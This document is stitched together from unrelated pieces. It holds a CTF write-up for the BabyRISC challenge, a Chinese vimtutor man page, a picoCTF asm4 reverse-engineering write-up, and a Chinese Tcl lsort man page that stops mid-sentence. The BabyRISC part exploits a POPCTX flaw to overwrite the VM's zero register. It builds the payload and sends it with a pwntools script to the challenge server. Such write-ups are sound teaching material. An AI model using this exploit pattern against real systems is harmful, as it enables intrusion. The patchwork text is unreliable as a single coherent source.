INSTRUCTION_DEFINE_BINARY_OP(ADD, +) INSTRUCTION_DEFINE_BINARY_OP(XOR, ^) INSTRUCTION_DEFINE_BINARY_OP(SUB, -) INSTRUCTION_DEFINE_BINARY_OP(MUL, *) INSTRUCTION_DEFINE_BINARY_OP(OR, |) INSTRUCTION_DEFINE_BINARY_IMM32_OP(ANDI, &) INSTRUCTION_DEFINE_BINARY_IMM32_OP(ADDI, +) INSTRUCTION_DEFINE_BINARY_IMM32_OP(XORI, ^) INSTRUCTION_DEFINE_BINARY_IMM32_OP(SUBI, -) INSTRUCTION_DEFINE_BINARY_IMM32_OP(MULI, *) INSTRUCTION_DEFINE_BINARY_IMM32_OP(ORI, |) INSTRUCTION_DEFINE_BINARY_IMM32_OP(SHR, >>) INSTRUCTION_DEFINE_BINARY_IMM32_OP(SHL, <<) // Actually define all other instructions INSTRUCTION_DEFINE_OP0(PRINTNL) { printf("\n"); return E_SUCCESS; } INSTRUCTION_DEFINE_OP1(PRINTDX) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg0, &value); if (ret != E_SUCCESS) { goto cleanup; } printf("%x", value); cleanup: return ret; } INSTRUCTION_DEFINE_OP1(PRINTDD) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg0, &value); if (ret != E_SUCCESS) { goto cleanup; } printf("%d", value); cleanup: return ret; } INSTRUCTION_DEFINE_OP1(PRINTC) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg0, &value); if (ret != E_SUCCESS) { goto cleanup; } printf("%c", value & 0xff); cleanup: return ret; } INSTRUCTION_DEFINE_OP0(RET) { return E_RETURN; } INSTRUCTION_DEFINE_OP1(RETNZ) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg0, &value); if (ret != E_SUCCESS) { goto cleanup; } if (value != 0) { ret = E_RETURN; } cleanup: return ret; } INSTRUCTION_DEFINE_OP1(RETZ) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg0, &value); if (ret != E_SUCCESS) { goto cleanup; } if (value == 0) { ret = E_RETURN; } cleanup: return ret; } INSTRUCTION_DEFINE_OP1(PUSH) { int ret = E_SUCCESS; reg_value_t reg_val = 0; reg_value_t sp_val = 0; ret = read_reg(reg0, &reg_val); if (ret != E_SUCCESS) { goto cleanup; } ret = read_reg(ASM_REGISTER_SP, &sp_val); if (ret != E_SUCCESS) { goto cleanup; } if (sp_val < (reg_value_t)0 || sp_val > (reg_value_t)(ASM_STACK_SIZE - sizeof(reg_val))) { ret = E_STACK_VIOLATION; goto cleanup; } memcpy(&asm_stack[sp_val], &reg_val, sizeof(reg_val)); ret = write_reg(ASM_REGISTER_SP, sp_val + sizeof(reg_val)); cleanup: return ret; } INSTRUCTION_DEFINE_OP1(POP) { int ret = E_SUCCESS; reg_value_t reg_val = 0; reg_value_t sp_val = 0; ret = read_reg(ASM_REGISTER_SP, &sp_val); if (ret != E_SUCCESS) { goto cleanup; } if (sp_val < (reg_value_t)sizeof(reg_val) || sp_val > (reg_value_t)ASM_STACK_SIZE) { ret = E_STACK_VIOLATION; goto cleanup; } sp_val -= sizeof(reg_val); memcpy(&reg_val, &asm_stack[sp_val], sizeof(reg_val)); ret = write_reg(reg0, reg_val); if (ret != E_SUCCESS) { goto cleanup; } ret = write_reg(ASM_REGISTER_SP, sp_val); cleanup: return ret; } INSTRUCTION_DEFINE_OP0(PUSHCTX) { int ret = E_SUCCESS; reg_value_t sp_val = 0; ret = read_reg(ASM_REGISTER_SP, &sp_val); if (ret != E_SUCCESS) { goto cleanup; } if (sp_val < (reg_value_t)0 || sp_val > (reg_value_t)(ASM_STACK_SIZE - sizeof(registers))) { ret = E_STACK_VIOLATION; goto cleanup; } memcpy(&asm_stack[sp_val], registers, sizeof(registers)); ret = write_reg(ASM_REGISTER_SP, sp_val + sizeof(registers)); cleanup: return ret; } INSTRUCTION_DEFINE_OP0(POPCTX) { int ret = E_SUCCESS; reg_value_t sp_val = 0; ret = read_reg(ASM_REGISTER_SP, &sp_val); if (ret != E_SUCCESS) { goto cleanup; } if (sp_val < (reg_value_t)sizeof(registers) || sp_val > (reg_value_t)ASM_STACK_SIZE) { ret = E_STACK_VIOLATION; goto cleanup; } sp_val -= sizeof(registers); memcpy(registers, &asm_stack[sp_val], sizeof(registers)); cleanup: return ret; } // We must implement division fully in-order to handle division-by-zero. INSTRUCTION_DEFINE_OP3(DIV) { int ret = E_SUCCESS; reg_value_t value1 = 0; reg_value_t value2 = 0; ret = read_reg(reg1, &value1); if (ret != E_SUCCESS) { goto cleanup; } ret = read_reg(reg2, &value2); if (ret != E_SUCCESS) { goto cleanup; } if (value2 == 0) { ret = E_DIV_ZERO; goto cleanup; } value1 = value1 / value2; ret = write_reg(reg0, value1); if (ret != E_SUCCESS) { goto cleanup; } cleanup: return ret; } // We must implement division fully in-order to handle division-by-zero. INSTRUCTION_DEFINE_OP_IMM32(DIVI) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg1, &value); if (ret != E_SUCCESS) { goto cleanup; } if (imm32 == 0) { ret = E_DIV_ZERO; goto cleanup; } value = value / imm32; ret = write_reg(reg0, value); if (ret != E_SUCCESS) { goto cleanup; } cleanup: return ret; } INSTRUCTION_DEFINE_OP_IMM32(ROL) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg1, &value); if (ret != E_SUCCESS) { goto cleanup; } value = _rotl(value, imm32); ret = write_reg(reg0, value); if (ret != E_SUCCESS) { goto cleanup; } cleanup: return ret; } INSTRUCTION_DEFINE_OP_IMM32(ROR) { int ret = E_SUCCESS; reg_value_t value = 0; ret = read_reg(reg1, &value); if (ret != E_SUCCESS) { goto cleanup; } value = _rotr(value, imm32); ret = write_reg(reg0, value); if (ret != E_SUCCESS) { goto cleanup; } cleanup: return ret; } // This is the table containing the function pointers for the instructions implementations. // If you add an instruction, add the INSTRUCTION_SYMBOL entry to this table with the opcode value. #define INSTRUCTION_SYMBOL(opcode) [opcode] = __INSTRUCTION_DEFINE_##opcode instruction_definition_t asm_instruction_definitions[MAX_ASM_OPCODE_VAL] = { INSTRUCTION_SYMBOL(ADD), INSTRUCTION_SYMBOL(ADDI), INSTRUCTION_SYMBOL(AND), INSTRUCTION_SYMBOL(ANDI), INSTRUCTION_SYMBOL(DIV), INSTRUCTION_SYMBOL(DIVI), INSTRUCTION_SYMBOL(MUL), INSTRUCTION_SYMBOL(MULI), INSTRUCTION_SYMBOL(OR), INSTRUCTION_SYMBOL(ORI), INSTRUCTION_SYMBOL(PRINTC), INSTRUCTION_SYMBOL(PRINTDD), INSTRUCTION_SYMBOL(PRINTDX), INSTRUCTION_SYMBOL(PRINTNL), INSTRUCTION_SYMBOL(RET), INSTRUCTION_SYMBOL(RETNZ), INSTRUCTION_SYMBOL(RETZ), INSTRUCTION_SYMBOL(ROL), INSTRUCTION_SYMBOL(ROR), INSTRUCTION_SYMBOL(SHL), INSTRUCTION_SYMBOL(SHR), INSTRUCTION_SYMBOL(SUB), INSTRUCTION_SYMBOL(SUBI), INSTRUCTION_SYMBOL(XOR), INSTRUCTION_SYMBOL(XORI), INSTRUCTION_SYMBOL(PUSH), INSTRUCTION_SYMBOL(POP), INSTRUCTION_SYMBOL(PUSHCTX), INSTRUCTION_SYMBOL(POPCTX), }; ``` ## Solution: This looks like some sort of a virtual machine implementing a RISC instruction set. The main function reads some instructions from the user, then appends some "admin" instructions which print the flag under certain conditions: ```c // If the user sets R0 so (R0 * 42) == 1 (impossible!), she deserves to read the flag ret |= file_write_opcode_imm32(payload_fp, ADDI, ASM_REGISTER_R1, ASM_REGISTER_ZERO, 42); ret |= file_write_opcode3(payload_fp, MUL, ASM_REGISTER_R2, ASM_REGISTER_R0, ASM_REGISTER_R1); ret |= file_write_opcode_imm32(payload_fp, SUBI, ASM_REGISTER_R2, ASM_REGISTER_R2, 1); ret |= file_write_opcode1(payload_fp, RETNZ, ASM_REGISTER_R2); ``` Our goal is to set R0 to that `(R0 * 42) == 1`. As the comment says, that's impossible if we follow the rules, therefore we must bypass them. Let's convert the code above to easier-to-view pseudo-code: ``` REG_R1 = REG_ZERO + 42 REG_R2 = REG_R0 * REG_R1 REG_R2 = REG_R2 - 1 IF <result> != 0 { RETURN } ``` `ASM_REGISTER_ZERO` is a register that always returns the value of zero. It would be nice if we could override it with a different value, since that would let us manipulate the equation, but the virtual machine blocks this explicitly: ```c int write_reg(asm_register_t reg, reg_value_t value) { if (reg < 0 || reg >= sizeof(registers) / sizeof(reg_value_t)) { return E_W_INVLD_REG; } else if (reg == ASM_REGISTER_ZERO) { return E_W2ZERO; } registers[reg] = value; return E_SUCCESS; } ``` Or does it? Let's take a closer look at where the virtual machine stores its register values: The global `registers` array. Using `write_reg` is one way to modify the value of registers, but it blocks changing `ASM_REGISTER_ZERO` as we saw. Luckily, there seems to be another function modifying the array which is less restrictive: ```c INSTRUCTION_DEFINE_OP0(POPCTX) { int ret = E_SUCCESS; reg_value_t sp_val = 0; ret = read_reg(ASM_REGISTER_SP, &sp_val); if (ret != E_SUCCESS) { goto cleanup; } if (sp_val < (reg_value_t)sizeof(registers) || sp_val > (reg_value_t)ASM_STACK_SIZE) { ret = E_STACK_VIOLATION; goto cleanup; } sp_val -= sizeof(registers); memcpy(registers, &asm_stack[sp_val], sizeof(registers)); cleanup: return ret; } ``` This function is the counterpart of `PUSHCTX`, which pushes all registers to the stack. Using this function, the register values get popped back from the stack to the registers themselves. Yes, even `ASM_REGISTER_ZERO`. So, if we want to modify the value of `ASM_REGISTER_ZERO`, we just need to prepare a stack where the value we want to write is located at the correct location to be popped into the register array. Now that we know how to write, let's find the value we want to write. Looks like we can fix the equation by setting `ASM_REGISTER_ZERO` to `-41` and setting `ASM_REGISTER_R0` to `1`: ``` REG_R1 = REG_ZERO + 42 ; REG_R1 = -41 + 42 = 1 REG_R2 = REG_R0 * REG_R1 ; REG_R2 = 1 * 1 = 1 REG_R2 = REG_R2 - 1 ; REG_R2 = 1 - 1 = 0 IF <result> != 0 { RETURN } ``` In the attached files we have received a program called `payload_builder`, which allows us to build a payload using C instructions just like the main function does. We'll use the following payload: ```c ret |= file_write_opcode_imm32(payload_fp, ADDI, ASM_REGISTER_R0, ASM_REGISTER_ZERO, -41); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode1(payload_fp, PUSH, ASM_REGISTER_R0); ret |= file_write_opcode(payload_fp, POPCTX); ret |= file_write_opcode_imm32(payload_fp, ADDI, ASM_REGISTER_R0, ASM_REGISTER_ZERO, 42); // Note that ASM_REGISTER_ZERO is -41 at this stage ``` We build the program and run it: ```console ubuntu@cloudhost:~/BabyRISC/BabyRISC/payload_builder$ ./payload_builder Written 37 bytes to 'payload.bin'. ubuntu@cloudhost:~/BabyRISC/BabyRISC/payload_builder$ xxd payload.bin 00000000: 0101 00d7 ffff ff19 0119 0119 0119 0119 ................ 00000010: 0119 0119 0119 0119 011c 0101 002a 0000 .............*.. 00000020: 00ff ffff ff ..... ``` Now, all that's left is to decode the flag, after it has been ROR-ed by the program via: ```c // Print each 4-bytes of the flag as 4-characters // (We might print some trailing null-characters if the flag length is not divisible by 4) int32_t * flag_start = (int32_t *)flag_string; int32_t * flag_end = (int32_t *)((char *)flag_string + strlen(flag_string)); for (int32_t * p = flag_start; p <= flag_end; ++p) { int32_t dword = *p; ret |= file_write_opcode_imm32(payload_fp, ADDI, ASM_REGISTER_R1, ASM_REGISTER_ZERO, dword); for (size_t j = 0; j < 4; j++) { ret |= file_write_opcode1(payload_fp, PRINTC, ASM_REGISTER_R1); ret |= file_write_opcode_imm32(payload_fp, ROR, ASM_REGISTER_R1, ASM_REGISTER_R1, 8); } } ``` Notice that this code has run after `ASM_REGISTER_ZERO` has been set to `-41`, so to get the real `dword` value we will have to reverse the operation. We'll use the following script to retrieve and decode the flag: ```python from pwn import * import re r = remote("babyrisc.shieldchallenges.com", 9070) with open("payload.bin", "rb") as payload_file: payload = payload_file.read() log.info(f"Sending payload: \n{hexdump(payload)}") r.send(payload) log.info(f"Received: '{r.recvline().decode('ascii').rstrip()}'") log.info(f"Received: '{r.recvline().decode('ascii').rstrip()}'") output = r.recvall() print(f"Received: \n{hexdump(output)}") if flag_match := re.search(b'\n\n\n\n\n\n\n\n(.*)\n\x1b', output): flag_encoded = flag_match.group(1) ASM_REGISTER_ZERO = -41 flag = "" for value in unpack_many(flag_encoded, 32, endian='little', sign=False): real_value = value - ASM_REGISTER_ZERO for i in range(4): flag += chr(real_value & 0xFF) real_value = ror(real_value, 8, 32) log.success("Flag: {}".format(flag.rstrip('\x00'))) ``` Output: ```console root@kali:/media/sf_CTFs/shabak/BabyRISC# python3 solve.py [+] Opening connection to babyrisc.shieldchallenges.com on port 9070: Done [*] Sending payload: 00000000 01 01 00 d7 ff ff ff 19 01 19 01 19 01 19 01 19 │····│····│····│····│ 00000010 01 19 01 19 01 19 01 19 01 1c 01 01 00 2a 00 00 │····│····│····│·*··│ 00000020 00 ff ff ff ff │····│·│ 00000025 [*] Received: 'User payload size: 33' [*] Received: '>>> Executing code!' [+] Receiving all data: Done (106B) [*] Closed connection to babyrisc.shieldchallenges.com port 9070 Received: 00000000 1b 5b 30 6d 0a 0a 0a 0a 0a 0a 0a 0a 3d 6c 61 67 │·[0m│····│····│=lag│ 00000010 52 52 49 53 1a 5f 64 6f 3c 73 6e 74 36 72 65 64 │RRIS│·_do│<snt│6red│ 00000020 4c 63 65 5f 38 6d 6f 75 45 74 5f 6f 3d 5f 62 75 │Lce_│8mou│Et_o│=_bu│ 00000030 3e 73 5f 61 3d 74 65 72 36 61 6c 6c 54 00 00 00 │>s_a│=ter│6all│T···│ 00000040 0a 1b 5b 33 36 6d 3e 3e 3e 20 1b 5b 30 6d 65 78 │··[3│6m>>│> ·[│0mex│ 00000050 65 63 75 74 65 64 20 30 78 38 46 20 69 6e 73 74 │ecut│ed 0│x8F │inst│ 00000060 72 75 63 74 69 6f 6e 73 0a 0a │ruct│ions│··│ 0000006a [+] Flag: flag{RISC_doesnt_reduce_amount_of_bugs_after_all} ```
sec-knowleage
.TH VIMTUTOR 1 "1998 December 28" .SH NAME vimtutor \- Vim 教程 .SH "总览 (SYNOPSIS)" .br .B vimtutor .SH "描述 (DESCRIPTION)" .B Vimtutor 打开 .B Vim 教程。 它首先 考备 文件, 这样 就可以 在 不改变 原文件 的 情况下 修改 当前文件。 .PP .B Vimtutor 对 那些 想 学习 一些 基本的 .B Vim 命令 的人 是 很有用的。 .PP 这个 命令 没有 任何选项 或 参数。 .B Vim 总是 以 Vi 蒹容模式 打开的。 .SH "文件 (FILES)" .TP 15 /usr/share/vim/vim56/tutor/tutor .B Vimtutor 文本文件. .SH "作者 (AUTHOR)" .B Vimtutor 最早是 Michael C. Pierce 和 科罗拉多 矿业学院(Colorado School of Mines) 的 Robert K. Ware 根据 科罗拉多 州立大学(Colorado State University) 的 Charles Smith 提出的 思想 为 Vi 写的. 电子邮件: bware@mines.colorado.edu。 .br Bram Moolenaar 专门为 .B Vim 修改 了它。 .SH "参见 (SEE ALSO)" vim(1) .SH "[中文版维护人]" .B 唐友 \<tony_ty@263.net\> .SH "[中文版最新更新]" .BR 2001/9/3 .SH "[中国Linux论坛man手册页翻译计划]" .BI http://cmpp.linuxforum.net
sec-knowleage
# asm4 Reverse Engineering, 400 points ## Description: > What will asm4("picoCTF_75806") return? Submit the flag as a hexadecimal value (starting with '0x'). NOTE: Your submission for this question will NOT be in the normal flag format. ```assembly asm4: <+0>: push ebp <+1>: mov ebp,esp <+3>: push ebx <+4>: sub esp,0x10 <+7>: mov DWORD PTR [ebp-0x10],0x276 <+14>: mov DWORD PTR [ebp-0xc],0x0 <+21>: jmp 0x518 <asm4+27> <+23>: add DWORD PTR [ebp-0xc],0x1 <+27>: mov edx,DWORD PTR [ebp-0xc] <+30>: mov eax,DWORD PTR [ebp+0x8] <+33>: add eax,edx <+35>: movzx eax,BYTE PTR [eax] <+38>: test al,al <+40>: jne 0x514 <asm4+23> <+42>: mov DWORD PTR [ebp-0x8],0x1 <+49>: jmp 0x587 <asm4+138> <+51>: mov edx,DWORD PTR [ebp-0x8] <+54>: mov eax,DWORD PTR [ebp+0x8] <+57>: add eax,edx <+59>: movzx eax,BYTE PTR [eax] <+62>: movsx edx,al <+65>: mov eax,DWORD PTR [ebp-0x8] <+68>: lea ecx,[eax-0x1] <+71>: mov eax,DWORD PTR [ebp+0x8] <+74>: add eax,ecx <+76>: movzx eax,BYTE PTR [eax] <+79>: movsx eax,al <+82>: sub edx,eax <+84>: mov eax,edx <+86>: mov edx,eax <+88>: mov eax,DWORD PTR [ebp-0x10] <+91>: lea ebx,[edx+eax*1] <+94>: mov eax,DWORD PTR [ebp-0x8] <+97>: lea edx,[eax+0x1] <+100>: mov eax,DWORD PTR [ebp+0x8] <+103>: add eax,edx <+105>: movzx eax,BYTE PTR [eax] <+108>: movsx edx,al <+111>: mov ecx,DWORD PTR [ebp-0x8] <+114>: mov eax,DWORD PTR [ebp+0x8] <+117>: add eax,ecx <+119>: movzx eax,BYTE PTR [eax] <+122>: movsx eax,al <+125>: sub edx,eax <+127>: mov eax,edx <+129>: add eax,ebx <+131>: mov DWORD PTR [ebp-0x10],eax <+134>: add DWORD PTR [ebp-0x8],0x1 <+138>: mov eax,DWORD PTR [ebp-0xc] <+141>: sub eax,0x1 <+144>: cmp DWORD PTR [ebp-0x8],eax <+147>: jl 0x530 <asm4+51> <+149>: mov eax,DWORD PTR [ebp-0x10] <+152>: add esp,0x10 <+155>: pop ebx <+156>: pop ebp <+157>: ret ``` ## Solution: Since this logic is long and complex, we'll just compile it and receive the answer by running it. We can compile the function into a C file using the following syntax ([reference](https://gcc.gnu.org/onlinedocs/gcc/Extended-Asm.html)): ```c #include <stdio.h> #include <stdlib.h> int asm4(char* in) { int val; asm ( "nop;" "nop;" "nop;" //"push ebp;" //"mov ebp,esp;" "push ebx;" "sub esp,0x10;" "mov DWORD PTR [ebp-0x10],0x276;" "mov DWORD PTR [ebp-0xc],0x0;" "jmp _asm_27;" "_asm_23:" "add DWORD PTR [ebp-0xc],0x1;" "_asm_27:" "mov edx,DWORD PTR [ebp-0xc];" "mov eax,DWORD PTR [%[pInput]];" "add eax,edx;" "movzx eax,BYTE PTR [eax];" "test al,al;" "jne _asm_23;" "mov DWORD PTR [ebp-0x8],0x1;" "jmp _asm_138;" "_asm_51:" "mov edx,DWORD PTR [ebp-0x8];" "mov eax,DWORD PTR [%[pInput]];" "add eax,edx;" "movzx eax,BYTE PTR [eax];" "movsx edx,al;" "mov eax,DWORD PTR [ebp-0x8];" "lea ecx,[eax-0x1];" "mov eax,DWORD PTR [%[pInput]];" "add eax,ecx;" "movzx eax,BYTE PTR [eax];" "movsx eax,al;" "sub edx,eax;" "mov eax,edx;" "mov edx,eax;" "mov eax,DWORD PTR [ebp-0x10];" "lea ebx,[edx+eax*1];" "mov eax,DWORD PTR [ebp-0x8];" "lea edx,[eax+0x1];" "mov eax,DWORD PTR [%[pInput]];" "add eax,edx;" "movzx eax,BYTE PTR [eax];" "movsx edx,al;" "mov ecx,DWORD PTR [ebp-0x8];" "mov eax,DWORD PTR [%[pInput]];" "add eax,ecx;" "movzx eax,BYTE PTR [eax];" "movsx eax,al;" "sub edx,eax;" "mov eax,edx;" "add eax,ebx;" "mov DWORD PTR [ebp-0x10],eax;" "add DWORD PTR [ebp-0x8],0x1;" "_asm_138:" "mov eax,DWORD PTR [ebp-0xc];" "sub eax,0x1;" "cmp DWORD PTR [ebp-0x8],eax;" "jl _asm_51;" "mov eax,DWORD PTR [ebp-0x10];" "add esp,0x10;" "pop ebx;" //"pop ebp;" //"ret ;" "nop;" "nop;" "nop;" :"=r"(val) : [pInput] "m"(in) ); return val; } int main(int argc, char** argv) { printf("0x%x\n", asm4("picoCTF_75806")); return 0; } ``` Note that jumps were ported to use labels, the input parameter was renamed and the frame setup and teardown were already taken care of by the compiler and therefore commented out in the assembly. The `nop`s were inserted in order to make it easier to locate the inline assembly with a debugger or disassembler. An alternative was to use a dedicated assembly file as we did in [asm3](asm3.md). We compile the program with: ```console root@kali:/media/sf_CTFs/pico/asm4# gcc -masm=intel -m32 solution.c -o solution root@kali:/media/sf_CTFs/pico/asm4# ``` And run it: ```console root@kali:/media/sf_CTFs/pico/asm4# ./solution 0x203 ```
sec-knowleage
'\" '\" Copyright (c) 1993 The Regents of the University of California. '\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\" Copyright (c) 1999 Scriptics Corporation '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" '\" RCS: @(#) $Id: lsort.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" The definitions below are for supplemental macros used in Tcl/Tk '\" manual entries. '\" '\" .AP type name in/out ?indent? '\" Start paragraph describing an argument to a library procedure. '\" type is type of argument (int, etc.), in/out is either "in", "out", '\" or "in/out" to describe whether procedure reads or modifies arg, '\" and indent is equivalent to second arg of .IP (shouldn't ever be '\" needed; use .AS below instead) '\" '\" .AS ?type? ?name? '\" Give maximum sizes of arguments for setting tab stops. Type and '\" name are examples of largest possible arguments that will be passed '\" to .AP later. If args are omitted, default tab stops are used. '\" '\" .BS '\" Start box enclosure. From here until next .BE, everything will be '\" enclosed in one large box. '\" '\" .BE '\" End of box enclosure. '\" '\" .CS '\" Begin code excerpt. '\" '\" .CE '\" End code excerpt. '\" '\" .VS ?version? ?br? '\" Begin vertical sidebar, for use in marking newly-changed parts '\" of man pages. The first argument is ignored and used for recording '\" the version when the .VS was added, so that the sidebars can be '\" found and removed when they reach a certain age. If another argument '\" is present, then a line break is forced before starting the sidebar. '\" '\" .VE '\" End of vertical sidebar. '\" '\" .DS '\" Begin an indented unfilled display. '\" '\" .DE '\" End of indented unfilled display. '\" '\" .SO '\" Start of list of standard options for a Tk widget. The '\" options follow on successive lines, in four columns separated '\" by tabs. '\" '\" .SE '\" End of list of standard options for a Tk widget. '\" '\" .OP cmdName dbName dbClass '\" Start of description of a specific option. cmdName gives the '\" option's name as specified in the class command, dbName gives '\" the option's name in the option database, and dbClass gives '\" the option's class in the option database. '\" '\" .UL arg1 arg2 '\" Print arg1 underlined, then print arg2 normally. '\" '\" RCS: @(#) $Id: lsort.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\" '\" # Set up traps and other miscellaneous stuff for Tcl/Tk man pages. .if t .wh -1.3i ^B .nr ^l \n(.l .ad b '\" # Start an argument description .de AP .ie !"\\$4"" .TP \\$4 .el \{\ . ie !"\\$2"" .TP \\n()Cu . el .TP 15 .\} .ta \\n()Au \\n()Bu .ie !"\\$3"" \{\ \&\\$1 \\fI\\$2\\fP (\\$3) .\".b .\} .el \{\ .br .ie !"\\$2"" \{\ \&\\$1 \\fI\\$2\\fP .\} .el \{\ \&\\fI\\$1\\fP .\} .\} .. '\" # define tabbing values for .AP .de AS .nr )A 10n .if !"\\$1"" .nr )A \\w'\\$1'u+3n .nr )B \\n()Au+15n .\" .if !"\\$2"" .nr )B \\w'\\$2'u+\\n()Au+3n .nr )C \\n()Bu+\\w'(in/out)'u+2n .. .AS Tcl_Interp Tcl_CreateInterp in/out '\" # BS - start boxed text '\" # ^y = starting y location '\" # ^b = 1 .de BS .br .mk ^y .nr ^b 1u .if n .nf .if n .ti 0 .if n \l'\\n(.lu\(ul' .if n .fi .. '\" # BE - end boxed text (draw box now) .de BE .nf .ti 0 .mk ^t .ie n \l'\\n(^lu\(ul' .el \{\ .\" Draw four-sided box normally, but don't draw top of .\" box if the box started on an earlier page. .ie !\\n(^b-1 \{\ \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .el \}\ \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\l'|0u-1.5n\(ul' .\} .\} .fi .br .nr ^b 0 .. '\" # VS - start vertical sidebar '\" # ^Y = starting y location '\" # ^v = 1 (for troff; for nroff this doesn't matter) .de VS .if !"\\$2"" .br .mk ^Y .ie n 'mc \s12\(br\s0 .el .nr ^v 1u .. '\" # VE - end of vertical sidebar .de VE .ie n 'mc .el \{\ .ev 2 .nf .ti 0 .mk ^t \h'|\\n(^lu+3n'\L'|\\n(^Yu-1v\(bv'\v'\\n(^tu+1v-\\n(^Yu'\h'-|\\n(^lu+3n' .sp -1 .fi .ev .\} .nr ^v 0 .. '\" # Special macro to handle page bottom: finish off current '\" # box/sidebar if in box/sidebar mode, then invoked standard '\" # page bottom macro. .de ^B .ev 2 'ti 0 'nf .mk ^t .if \\n(^b \{\ .\" Draw three-sided box if this is the box's first page, .\" draw two sides but no top otherwise. .ie !\\n(^b-1 \h'-1.5n'\L'|\\n(^yu-1v'\l'\\n(^lu+3n\(ul'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .el \h'-1.5n'\L'|\\n(^yu-1v'\h'\\n(^lu+3n'\L'\\n(^tu+1v-\\n(^yu'\h'|0u'\c .\} .if \\n(^v \{\ .nr ^x \\n(^tu+1v-\\n(^Yu \kx\h'-\\nxu'\h'|\\n(^lu+3n'\ky\L'-\\n(^xu'\v'\\n(^xu'\h'|0u'\c .\} .bp 'fi .ev .if \\n(^b \{\ .mk ^y .nr ^b 2 .\} .if \\n(^v \{\ .mk ^Y .\} .. '\" # DS - begin display .de DS .RS .nf .sp .. '\" # DE - end display .de DE .fi .RE .sp .. '\" # SO - start of list of standard options .de SO .SH "STANDARD OPTIONS" .LP .nf .ta 5.5c 11c .ft B .. '\" # SE - end of list of standard options .de SE .fi .ft R .LP See the \\fBoptions\\fR manual entry for details on the standard options. .. '\" # OP - start of full description for a single option .de OP .LP .nf .ta 4c Command-Line Name: \\fB\\$1\\fR Database Name: \\fB\\$2\\fR Database Class: \\fB\\$3\\fR .fi .IP .. '\" # CS - begin code excerpt .de CS .RS .nf .ta .25i .5i .75i 1i .. '\" # CE - end code excerpt .de CE .fi .RE .. .de UL \\$1\l'|0\(ul'\\$2 .. .TH lsort 3tcl 8.3 Tcl "Tcl Built-In Commands" .BS '\" Note: do not modify the .SH NAME line immediately below! .SH NAME lsort \- 给一个列表的元素排序 .SH "总览 SYNOPSIS" \fBlsort \fR?\fIoptions\fR? \fIlist\fR .BE .SH "描述 DESCRIPTION" .PP 这个命令给 \fIlist \fR的元素排序,返回按整理后的次序(排列)的一个新列表。\fBlsort\fR 命令的实现使用了归并排序算法,这个算法有 O(n log n) 性能特征的一个稳定的排序算法。 .PP 缺省的使用 ASCII 排序,并按升序返回结果。但是,可以在 \fIlist\fR 的前面指定任何下列参数来控制排序处理(接受唯一性的缩写): .TP 20 \fB\-ascii\fR 字符串比较使用 ASCII (作为)整理(collation)次序。这是缺省的。 .TP 20 \fB\-dictionary\fR 使用字典式样的比较。除了下列两点之外它同于 \fB-ascii\fR。(a) 除了作为一个 tie-breaker 之外忽略大写,(b) 如果字符串包含嵌入的数字,数字作为整数来比较而不是字符。例如,在 \fB-dictionary\fR 模式下,\fBbigBoy\fR 排序在 \fBbigbang\fR 和 \fBbigboy \fR之间,而 \fBx10y\fR 排序在 \fBx9y\fR 和 \fBx11y \fR之间。 .TP 20 \fB\-integer\fR 把列表元素转换成整数并使用整数比较。 .TP 20 \fB\-real\fR 把列表元素转换成浮点值并使用浮点比较。 .TP 20 \fB\-command\0\fIcommand\fR 使用 \fIcommand\fR 作为一个比较命令。想比较两个元素,要求由 \fIcommand\fR 构成的一个 Tcl 脚本的值,并加上两个元素作为(向这个过程)附加的参数。如果第一个参数被认定为小于、等于、或大于第二个参数,这个脚本应该分别返回小于、等于、或大于零的一个整数。 .TP 20 \fB\-increasing\fR 按升序整理这个列表(“最小” 的项目在最先)。这是缺省的。 .TP 20 \fB\-decreasing\fR 按降序整理这个列表(“最大” 的项目在最先)。 .TP 20 \fB\-index\0\fIindex\fR 如果指定了这个选项,\fIlist\fR 的每个元素自身必须是一个正确的 Tcl 子列表。不是基于整个子列表来排序,\fBlsort\fR 将从每个子列表中提取第 \fIindex \fR个元素并基于这个给定的元素来排序。\fIindex\fR 允许使用关键字 \fBend\fR 来在子列表的最后的元素上排序, .VS 8.3.4 而 \fBend-\fIindex\fR sorts on a sublist element offset from the end .VE 。例如, .RS .CS lsort -integer -index 1 {{First 24} {Second 18} {Third 30}} .CE 返回 \fB{Second 18} {First 24} {Third 30}\fR, 并且 .VS 8.3.4 '\" '\" This example is from the test suite! '\" .CS lsort -index end-1 {{a 1 e i} {b 2 3 f g} {c 4 5 6 d h}} .CE 返回 \fB{c 4 5 6 d h} {a 1 e i} {b 2 3 f g}\fR. .VE 这个选项比使用 \fB\-command\fR 来完成同样的功能要更加高效。 .RE .TP 20 \fB\-unique\fR 如果指定了这个选项,则保留在这个列表中找到的重复的(duplicate)元素的最后一组。注意重复是相对于在排序中使用的比较来决定的。所以如果使用了 \fI\-index 0\fR ,\fB{1 a}\fR 和 \fB{1 b}\fR 将被认为是重复的并只保留第二个元素 \fB{1 b}\fR。 .SH "注意 NOTES" .PP The options to 